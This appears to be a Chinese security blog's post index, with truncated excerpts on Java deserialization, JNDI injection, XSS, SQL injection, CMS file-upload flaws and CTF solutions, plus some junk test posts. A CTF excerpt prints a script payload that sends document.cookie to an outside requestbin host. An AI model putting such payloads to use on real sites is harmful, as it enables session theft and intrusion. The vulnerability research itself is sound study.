fffffffffffffffffffddd

转载 学习笔记（3):深度学习之实战TensorFlow入门-适合我学吗？

转载 学习笔记（2):MT5编程从入门到精通：MQL5编程认知-MT5编程宣传

本课程是MT5编程从入门到精通的第一阶段课程，详细的介绍了没有编程经验的小白也能快速的进入MT5编程的世界，为没有编程经验的外汇交易爱好者，树立MT5程序化交易的信心。 本阶段课程共分为三个章节，第一章重点讲解了MT5的安装与调试，MT5数据文件介绍，以及学完本课程后能开发出怎么的程序化交易；第二章重点讲解了MT5拥有多货币、多周期回测功能，以及MT5强大的参数优化功能和MT5的EA生成功能；...

转载 whatisjava

B

原创 Generate all unserialize pyload via serialVersionUID

简介最近遇到了个shiro老版本的反序列漏洞, 但是只能在用URLDNS的时候能成功, 除了CommonsCollections在shiro上是不行的, 使用其他gadget的时候也失败了, 怀疑有SUID的原因。java在打反序列时, 如果字节流中的serialVersionUID与目标服务器对应类中的serialVersionUID不同时就会出现异常。在目标出现异常时, 如果会输出异常信息并且...

原创 Generate all unserialize payload via serialVersionUID

简介最近遇到了个shiro老版本的反序列漏洞, 但是只能在用URLDNS的时候能成功, 除了CommonsCollections在shiro上是不行的, 使用其他gadget的时候也失败了, 怀疑有SUID的原因。java在打反序列时, 如果字节流中的serialVersionUID与目标服务器对应类中的serialVersionUID不同时就会出现异常。在目标出现异常时, 如果会输出异常信息并且...

原创 Modify ysoserial jar serialVersionUID

简介Java在反序列时, 会把传来的字节流中的serialVersionUID与本地对应类的serialVersionUID进行校验, 在两个SUID不同的情况下, 会抛出版本号不同的异常, 不再进行反序列。123456789if (model.serializable == osc.serializable && !cl.isArray() && ...

原创 逸创云客服系统 鸡肋xss分析

简介一套云客服系统, 以前我salt哥教我挖的xss, 自己以前做测试的时候遇到过几次用这系统的 打poc都能成功, 不过最近又遇到了一个, 尝试用以前的poc打的时候,发现失败了。看了一下最新的代码, 发现已经修复了。修复方法为1: 限制了postmessage的来源必须是support.kf5.com2: showNotice方法当中, 把innerHTML改成了innerText尝试绕过了一...

原创 Some vulnerabilities in JEECMSV9

之前遇到了一个JEECMS大概看了一下, 测试版本JEECMSV9.3SSRF/src/main/java/com/jeecms/cms/action/member/UeditorAct.java123456789101112131415161718192021@RequestMapping(value = "/ueditor/getRemoteImage.jspx")public void ...

原创 ThinkCMFX arbitrarily file upload

code { white-space: normal; word-break: break-all; }0x01 前言ThinkCMF存在两个版本, ThinkCMF基于Thinkphp5开发, ThinkCMFX基于Thinkphp3开发。 好久以前做测试的时候遇到了CMFX, 就下载了一份看了一下。还找到了一些SQL注入和其他的漏洞, 不...

原创 欢迎asdsaddsadddsadsadsadsa

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Ma...

原创 Exploitng JNDI Injection In Java

概要https://www.veracode.com/blog/research/exploiting-jndi-injections-java跟着这文章调了一遍, 之前一度以为在jdk 8u191之后, JNDI注入也就只能打打反序列了,看了这文章后发现了一种新的场景。之前JNDI注入都是依靠于getObjectFactoryFromReference时,如果目标classpath里找不到指定的...

原创 aaa,ccc

aaaabbbb

原创 aaa"abbbb"

qqqqq

原创 aaa"abbbb"

aaaabbbb

原创 aaaaaaaabbbbbbbb><aaaa>"

aaaa

原创 "aaaaa"bbbb

http://www.baidu.com/xxxxx"xxxxx

原创 RMI ReferenceWrapper_Stub With Hostname

概要去年我salt大哥带我搞一个存在FastJson漏洞站的时候, 在ECS上启动rmi后,使用Reference 加载远程codebase代码库的方法, 但是一直没能成功执行命令。最后才了解到需要修改掉/etc/hostname文件为公网ip地址才能够正常利用, 在修改掉/etc/hostname为公网ip后,成功弹回来了shell。失败原因当时使用的启动rmi服务的java代码。RMISer...

原创 PHPMyFAQ-SQL-Injection-With-FILTER_VALIDATE_EMAIL

概要去年遇到一套这个程序而挖的, 主要也就是因为开发者过于的相信PHP自带的FILTER_VALIDATE_EMAIL邮箱验证。在使用了filter_var($email,FILTER_VALIDATE_EMAIL);验证邮箱后, 没有进一步做处理 直接格式化字符串进了sql语句导致了注入。FILTER_VALIDATE_EMAIL本地调试版本: PHP5.4.5首先来看看PHP的filter_...

原创 JNDI-Injection-With-LDAP-Unserialize

前言前段时间FastJson的利用,最后使用了JNDI注入的方式 使得利用条件变得简单。从一开始的RMI到LDAP, 都是把一个Reference对象绑定到N/D服务上, 最终实例化CodeBase远程代码库的类实现RCE。但是这种方法在高版本jdk中已经不再能够使用, 由于TrustURLCodeBase的限制, 不再能够加载远程的代码库。最近看几年前的BlackHat JNDI PPT时, 发...

原创 jQuery-File-Upload-arbitrarily-file-upload-Vuln

在这看到的, 看到这个的时候有点疑惑这玩意不应该就是个前端的上传么, 怎么还会造成任意文件上传漏洞。 就去下了个源码看了下。漏洞复现https://github.com/blueimp/jQuery-File-Upload/releases/tag/v9.22.0下载了代码后, 发现原来也带了后端处理上传的脚本。在server目录下。在server/index.php中12requir...

原创 Dedecms 猜后台管理员账号的一个小技巧

巅峰极客里遇到的一个案例(yx-tv.com)。案例为,windows下的dedecms 好像是2017版本, 开启了会员中心,修改了后台的路径,然后用之前windows下dedecms找后台路径的方法, 发现tags.php被删除了,但是plus/rss.php文件存在, 然后用这方法就成功的找到了后台。1234567891011121314151617import requestsimpo...

原创 CSP unsafe-inline时, 引入外部js

前言原文: https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa用自己的理解, 把这个文章比较通俗的翻译补充了一下。利用场景当csp有Unsafe-inline时, 并且受限于csp无法直接引入外部js, 当frame-src 为self, 或者能引入当前域的资源的时...

原创 phpMyAdmin4.8.1 文件包含漏洞

起因一个很简单的漏洞, 分析的文章也都出来了很多, 但是看了那些文章, 我一直搞不懂为啥问号要双重url编码, 我自己看那些文章感觉不编码应该也能成功利用的。 并且好像大家对问号编码的说法各有不同。 还是自己下载了份源码看了一下。4.8.1下载地址:https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-lan...

原创 TCTF-h4x0rs.date

TCTF的题, 看到了大佬的一种解法。 学习了一下这种解法的原理。https://gist.github.com/tyage/8d8aead76ffc4924579783d72a63419f12<script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script>&lt...

原创 PHPCMS MT_RAND SEED CRACK致authkey泄露。

正文看到phpcms更新了, 看了下补丁, 分析了下他修复的漏洞。这种漏洞在CTF中还是比较常见的, 实例我还是第一次遇到。在INSTALL.PHP中1 $cookie_pre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ').'_';$auth_key = random(20, '129456...

原创 为什么$_SERVER['HTTP_HOST']有时是不可控的

最近在看一套程序的时候, 看到一段代码。如果SERVRT['HTTP_HOST']可以控制的话, 可以造成一个漏洞,本地是测试成功了, 但是在测试demo的时候就失败掉了。所以这里来谈谈SERVER['HTTP_HOST']为什么有时会不可控。123456 GET /123.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5....

原创 当表名可控的注入遇到了Describe时的几种情况。

SHOW COLUMNS之前小嘎嘎遇到了个注入是表前缀不可控,表名可控的注入,但是在表名进入的select语句执行之前, 执行了一次SHOW COLUMNS FROM $TABLE。如果SHOW COLUMNS语句执行出错了的话,就不会再执行后面的SELECT语句。大概代码如:mysql_connect("localhost","root","xiaoyu");mysql_query("us...

原创 为什么`(backtick)能做&quot;注释符&quot;

文章用markdown写的,用`的时候老是成了代码块,找了会资料都没转义掉,以下用backtick代替`。很久以前的一个Paper,介绍了mysql下的注释符,里面包含了两种不常见的"注释符"。今天有小伙伴刚好来问了一下我, 为啥backtick做注释符时,并不是通用的, 也就是有时候并不能注释掉,不能像#这种注释符通用。(其实paper里的NOTE已经基本解答了这个问题,不过NOTE写的是只...

原创 为什么感觉在实际的测试中ORDER BY注入的比例变高了

之前去阿里先知大会的时候, 在听greg.wu的议题的时候, 听到他提了一下他挖order by注入的比例占所有注入比例的20-30%(如果没记错的话)自己在各种测试的过程中,发现的order by注入也确实不少, 每次看到order,sort之类的参数都会有点小兴奋。那为什么在现在sql注入越来越少的情况下,order by注入的比例还不低呢。我感觉是因为常见的查询,直接自己预编译或者用...

原创 2017 0CTF simplesqlin

没打0ctf, 但是在看大佬们的writeup的时候发现了这道题。当时就觉得这个绕过莫名其妙, 不知道是怎么写的过滤。看了几个博客, 好像都不太清楚绕过的原理,就这样测了下就绕过去了。不过,当看到这题的flag之后,就大概知道为什么在payload之间插入%00这种可以绕过了。flag是flag{W4f_bY_paSS_FOR_CI} 也就是waf bypass for ci, 也就是用了...